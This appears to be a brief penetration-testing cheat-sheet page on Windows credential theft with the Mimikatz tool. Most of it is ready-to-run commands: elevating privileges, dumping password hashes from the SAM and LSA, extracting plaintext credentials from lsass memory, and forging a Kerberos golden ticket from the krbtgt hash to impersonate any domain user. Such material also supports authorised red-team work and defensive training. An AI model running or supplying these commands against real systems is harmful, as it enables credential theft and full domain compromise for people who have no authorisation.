Credentials on Windows
Mimikatz
To quote its creator's github, mimikatz
is a tool I've made to learn C and make somes experiments with Windows security.
It's well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory.
mimikatz
can also perform pass-the-hash, pass-the-ticket, build Golden tickets, play with certificates or private keys, vault, ...
Hash dumping
#Checks if mimikatz is running with admin rights, elevates those (code 20 ; OK)
privilege::debug
token::elevate
#Dumps from SAM (Security Account Managers)
lsadump::lsa /patch
lsadump::SAM
#Extracts from the lsass.exe process (memory)
sekurlsa::logonpasswords
Golden ticket creation
A Golden Ticket is a TGT using the KRBTGT NTLM password hash to encrypt and sign.
A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain.
#Creates a golden ticket using the krbtgt user's hash and SID
kerberos::golden /user:[admin] /domain:TEST.local /sid:[sid] /krbtgt:[NTLM hash]
Last updated
Was this helpful?